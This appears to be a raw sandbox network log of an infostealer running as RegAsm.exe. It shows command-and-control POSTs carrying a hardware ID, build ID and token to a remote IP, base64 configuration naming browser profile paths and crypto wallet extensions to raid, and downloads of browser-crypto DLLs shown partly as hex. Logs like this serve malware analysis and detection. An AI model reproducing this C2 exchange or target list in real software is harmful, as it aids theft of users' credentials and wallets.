                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
2024-04-10 06:56:17 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.4 | 49744 | 95.217.212.139 | 443 | 7652 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-10 06:56:17 UTC | 326 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----AAKEGIJEHJDGDHJKJKKJ
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0
                                                                                                                                                                                                          Host: 95.217.212.139
                                                                                                                                                                                                          Content-Length: 279
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Cache-Control: no-cache
2024-04-10 06:56:17 UTC | 279 | OUT |
                                                                                                                                                                                                          Data Ascii: ------AAKEGIJEHJDGDHJKJKKJContent-Disposition: form-data; name="hwid"530BC84D2CFE1030361446-a33c7340-61ca-11ee-8c18-806e6f6e6963------AAKEGIJEHJDGDHJKJKKJContent-Disposition: form-data; name="build_id"911b907d575a663515ef24804cc499f0------
2024-04-10 06:56:18 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Wed, 10 Apr 2024 06:56:18 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
2024-04-10 06:56:18 UTC | 69 | IN | Data Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 30 7c 61 32 61 61 62 61 62 30 33 61 35 62 32 30 39 39 35 61 30 33 65 33 65 30 33 37 38 30 65 62 64 36 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 30 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: 3a1|1|1|0|a2aabab03a5b20995a03e3e03780ebd6|1|1|1|0|0|50000|00


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.4 | 49745 | 95.217.212.139 | 443 | 7652 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-10 06:56:20 UTC | 326 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----JEBKECAFIDAFIECBKEHD
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0
                                                                                                                                                                                                          Host: 95.217.212.139
                                                                                                                                                                                                          Content-Length: 331
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Cache-Control: no-cache
2024-04-10 06:56:20 UTC | 331 | OUT |
                                                                                                                                                                                                          Data Ascii: ------JEBKECAFIDAFIECBKEHDContent-Disposition: form-data; name="token"a2aabab03a5b20995a03e3e03780ebd6------JEBKECAFIDAFIECBKEHDContent-Disposition: form-data; name="build_id"911b907d575a663515ef24804cc499f0------JEBKECAFIDAFIECBKEHDCont
2024-04-10 06:56:21 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Wed, 10 Apr 2024 06:56:21 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
2024-04-10 06:56:21 UTC | 1564 | IN |
                                                                                                                                                                                                          Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.4 | 49746 | 95.217.212.139 | 443 | 7652 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-10 06:56:21 UTC | 326 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----ECGIIIDAKJDHJKFHIEBF
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0
                                                                                                                                                                                                          Host: 95.217.212.139
                                                                                                                                                                                                          Content-Length: 331
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Cache-Control: no-cache
2024-04-10 06:56:21 UTC | 331 | OUT |
                                                                                                                                                                                                          Data Ascii: ------ECGIIIDAKJDHJKFHIEBFContent-Disposition: form-data; name="token"a2aabab03a5b20995a03e3e03780ebd6------ECGIIIDAKJDHJKFHIEBFContent-Disposition: form-data; name="build_id"911b907d575a663515ef24804cc499f0------ECGIIIDAKJDHJKFHIEBFCont
2024-04-10 06:56:22 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Wed, 10 Apr 2024 06:56:22 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
2024-04-10 06:56:22 UTC | 5165 | IN |
                                                                                                                                                                                                          Data Ascii: 1420TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.4 | 49750 | 95.217.212.139 | 443 | 7652 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-10 06:56:22 UTC | 327 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----DHCAECGIEBKJKEBGDHDA
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0
                                                                                                                                                                                                          Host: 95.217.212.139
                                                                                                                                                                                                          Content-Length: 7105
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Cache-Control: no-cache
2024-04-10 06:56:22 UTC | 7105 | OUT |
                                                                                                                                                                                                          Data Ascii: ------DHCAECGIEBKJKEBGDHDAContent-Disposition: form-data; name="token"a2aabab03a5b20995a03e3e03780ebd6------DHCAECGIEBKJKEBGDHDAContent-Disposition: form-data; name="build_id"911b907d575a663515ef24804cc499f0------DHCAECGIEBKJKEBGDHDACont
2024-04-10 06:56:23 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Wed, 10 Apr 2024 06:56:23 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
2024-04-10 06:56:23 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.4 | 49753 | 95.217.212.139 | 443 | 7652 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-10 06:56:23 UTC | 242 | OUT | GET /sqln.dll HTTP/1.1
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0
                                                                                                                                                                                                          Host: 95.217.212.139
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                          2024-04-10 06:56:24 UTC248INHTTP/1.1 200 OK
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Wed, 10 Apr 2024 06:56:24 GMT
                                                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                                                          Content-Length: 2459136
                                                                                                                                                                                                          Last-Modified: Mon, 01 Apr 2024 09:22:32 GMT
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          ETag: "660a7cd8-258600"
                                                                                                                                                                                                          Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.4 | 49754 | 95.217.212.139 | 443 | 7652 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp | Bytes transferred | Direction | Data
2024-04-10 06:56:26 UTC | 327 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----AEHIDAKECFIEBGDHJEBK
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0
Host: 95.217.212.139
Content-Length: 4677
Connection: Keep-Alive
Cache-Control: no-cache
2024-04-10 06:56:26 UTC | 4677 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 41 45 48 49 44 41 4b 45 43 46 49 45 42 47 44 48 4a 45 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 32 61 61 62 61 62 30 33 61 35 62 32 30 39 39 35 61 30 33 65 33 65 30 33 37 38 30 65 62 64 36 0d 0a 2d 2d 2d 2d 2d 2d 41 45 48 49 44 41 4b 45 43 46 49 45 42 47 44 48 4a 45 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 31 31 62 39 30 37 64 35 37 35 61 36 36 33 35 31 35 65 66 32 34 38 30 34 63 63 34 39 39 66 30 0d 0a 2d 2d 2d 2d 2d 2d 41 45 48 49 44 41 4b 45 43 46 49 45 42 47 44 48 4a 45 42 4b 0d 0a 43 6f 6e 74
Data Ascii: ------AEHIDAKECFIEBGDHJEBKContent-Disposition: form-data; name="token"a2aabab03a5b20995a03e3e03780ebd6------AEHIDAKECFIEBGDHJEBKContent-Disposition: form-data; name="build_id"911b907d575a663515ef24804cc499f0------AEHIDAKECFIEBGDHJEBKCont
2024-04-10 06:56:27 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 10 Apr 2024 06:56:27 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-04-10 06:56:27 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.4 | 49755 | 95.217.212.139 | 443 | 7652 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp | Bytes transferred | Direction | Data
2024-04-10 06:56:27 UTC | 327 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----KEBGHCBAEGDHIDGCBAEC
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0
Host: 95.217.212.139
Content-Length: 1529
Connection: Keep-Alive
Cache-Control: no-cache
2024-04-10 06:56:27 UTC | 1529 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 4b 45 42 47 48 43 42 41 45 47 44 48 49 44 47 43 42 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 32 61 61 62 61 62 30 33 61 35 62 32 30 39 39 35 61 30 33 65 33 65 30 33 37 38 30 65 62 64 36 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 42 47 48 43 42 41 45 47 44 48 49 44 47 43 42 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 31 31 62 39 30 37 64 35 37 35 61 36 36 33 35 31 35 65 66 32 34 38 30 34 63 63 34 39 39 66 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 42 47 48 43 42 41 45 47 44 48 49 44 47 43 42 41 45 43 0d 0a 43 6f 6e 74
Data Ascii: ------KEBGHCBAEGDHIDGCBAECContent-Disposition: form-data; name="token"a2aabab03a5b20995a03e3e03780ebd6------KEBGHCBAEGDHIDGCBAECContent-Disposition: form-data; name="build_id"911b907d575a663515ef24804cc499f0------KEBGHCBAEGDHIDGCBAECCont
2024-04-10 06:56:28 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 10 Apr 2024 06:56:28 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-04-10 06:56:28 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.4 | 49756 | 95.217.212.139 | 443 | 7652 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp | Bytes transferred | Direction | Data
2024-04-10 06:56:28 UTC | 326 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----DGIJEGHDAECAKECAFCAK
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0
Host: 95.217.212.139
Content-Length: 437
Connection: Keep-Alive
Cache-Control: no-cache
2024-04-10 06:56:28 UTC | 437 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 44 47 49 4a 45 47 48 44 41 45 43 41 4b 45 43 41 46 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 32 61 61 62 61 62 30 33 61 35 62 32 30 39 39 35 61 30 33 65 33 65 30 33 37 38 30 65 62 64 36 0d 0a 2d 2d 2d 2d 2d 2d 44 47 49 4a 45 47 48 44 41 45 43 41 4b 45 43 41 46 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 31 31 62 39 30 37 64 35 37 35 61 36 36 33 35 31 35 65 66 32 34 38 30 34 63 63 34 39 39 66 30 0d 0a 2d 2d 2d 2d 2d 2d 44 47 49 4a 45 47 48 44 41 45 43 41 4b 45 43 41 46 43 41 4b 0d 0a 43 6f 6e 74
Data Ascii: ------DGIJEGHDAECAKECAFCAKContent-Disposition: form-data; name="token"a2aabab03a5b20995a03e3e03780ebd6------DGIJEGHDAECAKECAFCAKContent-Disposition: form-data; name="build_id"911b907d575a663515ef24804cc499f0------DGIJEGHDAECAKECAFCAKCont
2024-04-10 06:56:29 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 10 Apr 2024 06:56:29 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-04-10 06:56:29 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.4 | 49757 | 95.217.212.139 | 443 | 7652 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-10 06:56:29 UTC | 326 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----BKEBFHIJECFIDGDGCGHC
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0
Host: 95.217.212.139
Content-Length: 437
Connection: Keep-Alive
Cache-Control: no-cache
2024-04-10 06:56:29 UTC | 437 | OUT | Data Ascii: ------BKEBFHIJECFIDGDGCGHCContent-Disposition: form-data; name="token"a2aabab03a5b20995a03e3e03780ebd6------BKEBFHIJECFIDGDGCGHCContent-Disposition: form-data; name="build_id"911b907d575a663515ef24804cc499f0------BKEBFHIJECFIDGDGCGHCCont
2024-04-10 06:56:30 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 10 Apr 2024 06:56:30 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-04-10 06:56:30 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.4 | 49758 | 95.217.212.139 | 443 | 7652 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-10 06:56:30 UTC | 221 | OUT | GET /freebl3.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0
Host: 95.217.212.139
Cache-Control: no-cache
2024-04-10 06:56:31 UTC | 246 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 10 Apr 2024 06:56:31 GMT
Content-Type: application/octet-stream
Content-Length: 685392
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
Connection: close
ETag: "6315a9f4-a7550"
Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.4 | 49759 | 95.217.212.139 | 443 | 7652 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-10 06:56:32 UTC | 221 | OUT | GET /mozglue.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0
Host: 95.217.212.139
Cache-Control: no-cache
2024-04-10 06:56:33 UTC | 246 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 10 Apr 2024 06:56:33 GMT
Content-Type: application/octet-stream
Content-Length: 608080
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
Connection: close
ETag: "6315a9f4-94750"
Accept-Ranges: bytes
                                                                                                                                                                                                          Data Ascii: 1B]zB|~<<9rIM1CKCL;]rF@ECCtPR;]1@E'I<9s CCtPR9rSREEFh
                                                                                                                                                                                                          2024-04-10 06:56:33 UTC16384INData Raw: 1b 89 c8 e9 b3 fe ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 07 89 c8 e9 c2 fe ff ff ff 15 b0 bf 08 10 cc cc cc cc 55 89 e5 57 56 89 ce 8b 79 20 85 ff 74 28 f0 ff 4f 38 75 22 8b 4f 14 83 f9 10 73 5f c7 47 10 00 00 00 00 c7 47 14 0f 00 00 00 c6 07 00 57 e8 2d 13 01 00 83 c4 04 8b 7e 18 c7 46 18 00 00 00 00 85 ff 74 1c 8b 07 85 c0 74 0d 50 ff 15 04 be 08 10 c7 07 00 00 00 00 57 e8 03 13 01 00 83 c4 04 8b 46 08 85 c0 75 2f 8b 46 04 85 c0 74 09 50 e8 ec 12 01 00 83 c4 04 5e 5f 5d c3 8b 07 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 76 20 50 e8 cf 12 01 00 83 c4 04 eb 86 c7 05 f4 f8 08 10 1a 2b 08 10 cc b9 18 00 00 00 e8 0d 80 02 00 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 04 89 c8 eb cf ff 15 b0 bf 08 10 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 e4 f8
                                                                                                                                                                                                          Data Ascii: H) sUWVy t(O8u"Os_GGW-~FttPWFu/FtP^_]v P+H) sUSWV
                                                                                                                                                                                                          2024-04-10 06:56:33 UTC16384INData Raw: 00 00 c7 44 24 34 07 00 00 00 66 c7 44 24 20 00 00 57 e8 e1 37 06 00 83 c4 04 89 c6 83 f8 07 8b 5c 24 04 0f 87 4b 03 00 00 8d 44 24 20 89 70 10 89 f1 01 f1 51 57 50 e8 fe 37 06 00 83 c4 0c 66 c7 44 74 20 00 00 8b 44 24 30 8b 4c 24 34 89 ca 29 c2 83 fa 11 0f 82 fd 05 00 00 8d 50 11 89 54 24 30 83 f9 08 72 06 8b 4c 24 20 eb 04 8d 4c 24 20 0f b7 15 de 4d 08 10 66 89 54 41 20 0f 10 05 ce 4d 08 10 0f 11 44 41 10 0f 10 05 be 4d 08 10 0f 11 04 41 66 c7 44 41 22 00 00 bf 10 00 00 00 57 e8 60 3e 00 00 83 c4 04 89 c6 8b 45 0c f2 0f 10 40 20 f2 0f 11 06 f2 0f 10 40 28 f2 0f 11 46 08 83 7c 24 34 08 72 06 8b 44 24 20 eb 04 8d 44 24 20 57 56 6a 03 6a 00 50 53 ff 15 2c e3 08 10 89 c3 56 e8 9e d2 00 00 83 c4 04 8b 4c 24 34 83 f9 08 8b 7c 24 08 0f 83 b0 03 00 00 85 db 0f
                                                                                                                                                                                                          Data Ascii: D$4fD$ W7\$KD$ pQWP7fDt D$0L$4)PT$0rL$ L$ MfTA MDAMAfDA"W`>E@ @(F|$4rD$ D$ WVjjPS,VL$4|$
                                                                                                                                                                                                          2024-04-10 06:56:33 UTC16384INData Raw: 08 0f 86 cc 02 00 00 83 c3 0f 89 d8 83 e0 f0 89 44 24 1c c1 eb 04 c1 e3 05 8d 34 1f 83 c6 50 80 7f 3c 00 89 7c 24 10 89 5c 24 18 74 0a 83 7f 40 00 0f 84 29 06 00 00 8d 47 0c 89 44 24 20 50 ff 15 30 be 08 10 8b 16 85 d2 0f 84 38 01 00 00 83 7a 08 00 0f 84 2e 01 00 00 8b 4a 04 8b 74 8a 0c 85 f6 0f 84 eb 01 00 00 8b 5f 40 85 db 75 60 0f bc fe 89 cb c1 e3 05 09 fb 0f bb fe 8b 7c 24 10 8b 44 24 18 0f af 5c 07 58 8b 44 07 68 89 74 8a 0c 01 d0 01 c3 83 42 08 ff 85 db 0f 84 a2 05 00 00 8b 44 24 1c 01 47 2c ff 74 24 20 ff 15 b0 be 08 10 85 db 0f 84 93 05 00 00 8b 4c 24 60 31 e9 e8 51 e7 01 00 89 d8 8d 65 f4 5e 5f 5b 5d c3 89 4c 24 04 89 54 24 14 8b 0b 8b 7b 04 89 3c 24 0f a4 cf 17 89 c8 c1 e0 17 31 c8 8b 53 0c 33 3c 24 89 7c 24 08 8b 4b 08 89 0c 24 89 53 04 0f a4
                                                                                                                                                                                                          Data Ascii: D$4P<|$\$t@)GD$ P08z.Jt_@u`|$D$\XDhtBD$G,t$ L$`1Qe^_[]L$T${<$1S3<$|$K$S
                                                                                                                                                                                                          2024-04-10 06:56:33 UTC16384INData Raw: 58 e9 75 ff ff ff c7 44 24 3c 00 00 00 00 8b 5c 24 04 e9 a5 fe ff ff 31 d2 a8 10 0f 44 54 24 18 31 c9 39 f2 0f 97 c0 0f 82 e1 fe ff ff 88 c1 e9 d5 fe ff ff b0 01 e9 ec fd ff ff 8b 46 04 83 f8 01 0f 87 13 01 00 00 89 f2 8b 06 31 c9 85 c0 8b 74 24 1c 0f 84 39 04 00 00 8b 48 04 83 e1 fe 89 0a 89 d1 83 e1 fe 89 54 24 04 8b 50 04 83 e2 01 09 ca 89 50 04 8b 54 24 04 8b 52 04 83 e2 01 09 ca 89 50 04 8b 4c 24 04 80 49 04 01 83 60 04 01 89 c1 e9 fb 03 00 00 c7 44 24 28 00 00 00 00 e9 f9 fd ff ff 8d 74 24 54 89 f1 e8 37 0b fe ff 8b 1e e9 47 ff ff ff 83 e3 fe 89 58 04 89 d6 8b 1a 85 db 0f 84 fb 01 00 00 8b 43 04 83 e0 fe 89 06 89 f0 83 e0 fe 8b 4b 04 83 e1 01 09 c1 89 4b 04 8b 4e 04 89 c8 83 e0 fe 0f 84 c0 01 00 00 8b 10 83 e2 fe 83 e1 01 09 d1 89 4e 04 89 30 8b 4b
                                                                                                                                                                                                          Data Ascii: XuD$<\$1DT$19F1t$9HT$PPT$RPL$I`D$(t$T7GXCKKNN0K
                                                                                                                                                                                                          2024-04-10 06:56:33 UTC16384INData Raw: c1 72 d1 88 cb 8b 50 04 83 e2 fe eb cc 83 e3 fe 89 1a 89 d6 83 e6 fe 8b 18 8b 48 04 83 e1 01 09 f1 89 48 04 85 db 0f 84 8d 0a 00 00 80 63 04 fe 8b 74 24 14 39 16 75 07 89 06 e9 69 ff ff ff 83 e0 fe 8b 56 04 83 e2 01 8d 0c 02 89 4e 04 85 c0 0f 84 25 0a 00 00 8b 08 83 e1 fe 09 d1 89 4e 04 89 30 8b 4e 04 83 e1 01 8b 50 04 83 e2 fe 09 ca 89 50 04 80 4e 04 01 85 ff 0f 84 1f 0a 00 00 39 37 0f 84 a0 05 00 00 e9 e0 05 00 00 8b 4c 24 1c 8b 19 89 d9 ba 00 f0 ff ff 21 d1 8b 70 08 21 d6 31 d2 39 f1 0f 97 c2 b9 ff ff ff ff 0f 42 d1 85 d2 0f 85 59 05 00 00 e9 c0 05 00 00 89 c1 85 d2 0f 85 c2 fe ff ff 8b 54 24 04 c7 02 00 00 00 00 8b 4c 24 08 c7 44 b1 14 01 00 00 00 83 fb 01 0f 84 17 02 00 00 89 10 8b 54 24 20 8b 44 24 48 85 c0 0f 84 c2 09 00 00 80 60 04 fe 8b 4c 24 0c
                                                                                                                                                                                                          Data Ascii: rPHHct$9uiVN%N0NPPN97L$!p!19BYT$L$DT$ D$H`L$


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.4 | 49760 | 95.217.212.139 | 443 | 7652 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp | Bytes transferred | Direction | Data
2024-04-10 06:56:34 UTC | 222 | OUT | GET /msvcp140.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0
Host: 95.217.212.139
Cache-Control: no-cache
2024-04-10 06:56:35 UTC | 246 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 10 Apr 2024 06:56:35 GMT
Content-Type: application/octet-stream
Content-Length: 450024
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
Connection: close
ETag: "6315a9f4-6dde8"
Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.4 | 49761 | 95.217.212.139 | 443 | 7652 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp | Bytes transferred | Direction | Data
2024-04-10 06:56:37 UTC | 218 | OUT | GET /nss3.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0
Host: 95.217.212.139
Cache-Control: no-cache
2024-04-10 06:56:38 UTC | 248 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 10 Apr 2024 06:56:37 GMT
Content-Type: application/octet-stream
Content-Length: 2046288
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
Connection: close
ETag: "6315a9f4-1f3950"
Accept-Ranges: bytes
                                                                                                                                                                                                          Data Ascii: w&58txu{Vh^_[]0= T1@@W@V)19}'P 1m@V{P8t.x@S8tp@SLH
